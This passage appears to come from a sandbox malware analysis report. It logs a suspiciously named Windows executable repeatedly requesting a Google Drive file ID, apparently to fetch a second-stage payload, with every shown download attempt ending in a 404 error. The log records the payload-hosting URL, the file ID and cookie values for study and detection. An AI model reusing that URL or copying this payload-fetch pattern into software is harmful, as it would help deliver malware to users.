                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-7UiBQj70X_oDWzDZG3YyaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 76 51 46 79 63 4b 74 33 48 55 6c 63 6f 59 48 4f 38 64 77 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7vQFycKt3HUlcoYHO8dwgg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.649950172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:42 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:43 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:42 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-a4TuIXSC2A9xuPwK7za_6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.649957142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:44 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:45 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC72YZqPZLiumLD5Y8Jy1CXnGGiwztTeQAjxncm_vbrK8efY83I3jPM7macU6A4sQSKP
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:45 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-b8pNSnWb6XVc0LERxp-cVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 43 53 71 6a 4c 77 67 47 70 6d 37 6a 7a 7a 69 51 4d 68 4e 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gCSqjLwgGpm7jzziQMhNKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.649966172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:47 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:48 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:48 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-xXhJskfuR3bPYBrLfitlgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.649972142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:50 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:51 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7yc2n6SdIuTuYUNVjoWTVC1IGdOvIDzPcXcMBs-QlxPlzoDaWxM7eeQnDgD1eQDnFK
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:51 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-j_ulvRD_YUGWkhRTgdKpDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 32 7a 4a 47 43 61 45 75 52 78 58 4d 35 73 58 58 57 78 50 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j2zJGCaEuRxXM5sXXWxP9w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.649979172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:53 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:54 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:53 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Z-cEnaQQ0PzucXo-q2wP6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.649985142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:55 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:56 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6YjTfEhJPw5sAKvMfpolIKVBDRw9THWaXRxGVwARYJ6R9XQq_eY1_y9ju61236nCzP
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:56 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-VixMaL7CJ91CD6gpyAhnKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 51 2d 59 48 4b 56 68 68 75 35 41 78 71 5a 75 47 6c 78 55 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dQ-YHKVhhu5AxqZuGlxUtw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.649995172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:58 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:59 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:59 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-faXNLTJX9kGuHEP2A5EK7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.650001142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
